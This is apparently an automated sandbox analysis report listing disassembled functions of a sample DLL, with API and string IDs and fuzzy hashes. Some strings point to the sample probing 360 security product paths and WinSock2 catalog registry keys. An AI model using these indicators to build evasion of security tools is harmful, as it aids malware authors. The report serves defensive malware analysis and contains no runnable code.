                                                                                                  • Instruction ID: 3d32fb05b4f0e0362b7b9cd0aaa418761e9398a752506ae5bdaf1bf6c7f8014f
                                                                                                  • Opcode Fuzzy Hash: 6ebde1e15a5daa3d485701c01873e90b9359cc9e4f17f74e3b8bc65d2ffc7e04
                                                                                                  • Instruction Fuzzy Hash: 2281CF72200F8886EB95DB15E8813DA73A5FB8C7D8F119125EA9A03BA4DF38C64DC740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180078A30 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
                                                                                                  • String ID: csm$f
                                                                                                  • API String ID: 3008409500-629598281
                                                                                                  • Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                                                  • Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
                                                                                                  • Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                                                  • Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004A39C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 158COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
                                                                                                  • String ID: Progman$Program manager$http://$open$p
                                                                                                  • API String ID: 1516062321-2122229248
                                                                                                  • Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                                                  • Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
                                                                                                  • Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                                                  • Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180056400 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 142registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
                                                                                                  • API String ID: 1838183957-848848004
                                                                                                  • Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                                                  • Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
                                                                                                  • Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                                                  • Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005619C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
                                                                                                  • API String ID: 1838183957-351904165
                                                                                                  • Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                                                  • Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
                                                                                                  • Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                                                  • Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005B708 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _time64
                                                                                                  • String ID: 360Ent$ForceNoPopup
                                                                                                  • API String ID: 1670930206-2160763818
                                                                                                  • Opcode ID: 3df8c11bbac872115ce6f895ee47564cdc6bd6ec8b8168957dd4759c0a914245
                                                                                                  • Instruction ID: 01ea4ee26c0475092520961f9a9bd5e8ca1980a4bc00605aab446d8ce5817636
                                                                                                  • Opcode Fuzzy Hash: 3df8c11bbac872115ce6f895ee47564cdc6bd6ec8b8168957dd4759c0a914245
                                                                                                  • Instruction Fuzzy Hash: FB419D32600B48CAEB928F35D8947DC37A4F74CBE8F04A215FA5A57AA5DF35C699C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180052160 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$CriticalDeleteSection
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                                                  • API String ID: 1297904149-2676930693
                                                                                                  • Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                                                  • Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
                                                                                                  • Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                                                  • Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180049164 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcess$OpenTokenWindow$DuplicateFindThread
                                                                                                  • String ID: Progman$Program manager
                                                                                                  • API String ID: 3967587520-2890643340
                                                                                                  • Opcode ID: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
                                                                                                  • Instruction ID: dc0f1755b95b22890c5ec93f314443dee37f8d14911f95f63aa97c4fa7f5c449
                                                                                                  • Opcode Fuzzy Hash: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
                                                                                                  • Instruction Fuzzy Hash: 51217F35706B0982EF968B55EC943E563A0FB8C7D4F158125EA5A06BB4DF7CC78C8704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180019044 Relevance: 16.6, APIs: 11, Instructions: 86libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 3317409091-0
                                                                                                  • Opcode ID: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                                                  • Instruction ID: 7be624b5aba991f8dce8e488531e7c4bc30f0810fde0e2206e2c198a200c07cc
                                                                                                  • Opcode Fuzzy Hash: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                                                  • Instruction Fuzzy Hash: F5316D31702B448AEB87DF6AA84479977E0BB4CFD4F098425AE0907764EF38D64AC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003F070 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Valuememset$CloseEnumOpen
                                                                                                  • String ID: stat
                                                                                                  • API String ID: 3313869694-548994849
                                                                                                  • Opcode ID: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                                                  • Instruction ID: bca1fd9f3236c41ce4b8b5e5b78ce057e793223580287a74ffbbd9e6a5e702b7
                                                                                                  • Opcode Fuzzy Hash: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                                                  • Instruction Fuzzy Hash: 4E616076614A8896D7A2CF25E4403DB77A4F7897D4F518216EB9C43BA8DF39C609CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004F30C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 91libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$Enter$AddressHandleModuleProc
                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                  • API String ID: 3224368425-736604160
                                                                                                  • Opcode ID: 1457c0c9fb358b3df7ed4e4eb8243274f5e99d83ec7a1bfee8148cfe039d852a
                                                                                                  • Instruction ID: ca62fe759e79ebbdf2345efd4774dc097ba4c8a46a0d6040fd790858b76b97b2
                                                                                                  • Opcode Fuzzy Hash: 1457c0c9fb358b3df7ed4e4eb8243274f5e99d83ec7a1bfee8148cfe039d852a
                                                                                                  • Instruction Fuzzy Hash: 2D418D31701A4896FA929F21AD843E933A0F748BE9F05C524E96A033A1CF38C79AC304
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180001284 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CountCriticalErrorFreeInitializeLastLibrarySectionSpinmemset
                                                                                                  • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
                                                                                                  • API String ID: 1208898459-1575494070
                                                                                                  • Opcode ID: 6febbc95fee42d1cf0ff652153e2663ec320583e122b5040a2f8e94a135876e8
                                                                                                  • Instruction ID: 73cde57fb6ccd56217924bcb925c7755019b6deb3a189e6d0e2bebe9dd713bb9
                                                                                                  • Opcode Fuzzy Hash: 6febbc95fee42d1cf0ff652153e2663ec320583e122b5040a2f8e94a135876e8
                                                                                                  • Instruction Fuzzy Hash: E1212C30602A0ED5FADBDB55AC543E823A5BF5C7D1F54C125A92A866A0EF28C75D8310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180028C8C Relevance: 15.2, APIs: 10, Instructions: 235COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FromString_wcsupr$HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2249050647-0
                                                                                                  • Opcode ID: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
                                                                                                  • Instruction ID: c2b84f69b377f8d486519554b3a5ef31eab8a077f1ecb1a3c09cbb62b7b5dce0
                                                                                                  • Opcode Fuzzy Hash: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
                                                                                                  • Instruction Fuzzy Hash: A5A19E36302A4881EBE79F15D8403E963A1FB58BD4F45C116EA5E5B6E9DF38CB89D300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180031364 Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 232COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$_wcsicmpmemmove
                                                                                                  • String ID: <meta$content$http-equiv$refresh$url
                                                                                                  • API String ID: 2361349637-3031182906
                                                                                                  • Opcode ID: 07de686381712597efe178b2a7e918757f008e94124c5655b5487fb9c73d084c
                                                                                                  • Instruction ID: c68d1c126d757315b10cfd3afd0c940563a20cd601959deafe1f98214d546180
                                                                                                  • Opcode Fuzzy Hash: 07de686381712597efe178b2a7e918757f008e94124c5655b5487fb9c73d084c
                                                                                                  • Instruction Fuzzy Hash: D1A17372701A498AEB568F69C8507DD23A1F74CBF5F45C216EA2943BD4EF78CA89C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800421D4 Relevance: 15.2, APIs: 10, Instructions: 163networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 505489203-0
                                                                                                  • Opcode ID: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
                                                                                                  • Instruction ID: 546e40b67bc81cdcf22b9085e67948acfa9500907e31d87aed3a5e4506fe483b
                                                                                                  • Opcode Fuzzy Hash: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
                                                                                                  • Instruction Fuzzy Hash: A6711C32B05B548AFB96CFA1E8403ED33B5B70879DF468025EE5627A98DF38C659C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180052280 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 220COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                                                  • API String ID: 0-1196714001
                                                                                                  • Opcode ID: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
                                                                                                  • Instruction ID: 902fc08f0a24e927d00bac490aa4b2e4fc0ab2cffff010c51715f7c20a33671b
                                                                                                  • Opcode Fuzzy Hash: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
                                                                                                  • Instruction Fuzzy Hash: 8B91E232701B4886EB96CB62A8407D973A0FB8DBD4F058225BF6D17795EF39CA49C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018002C720 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 217COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
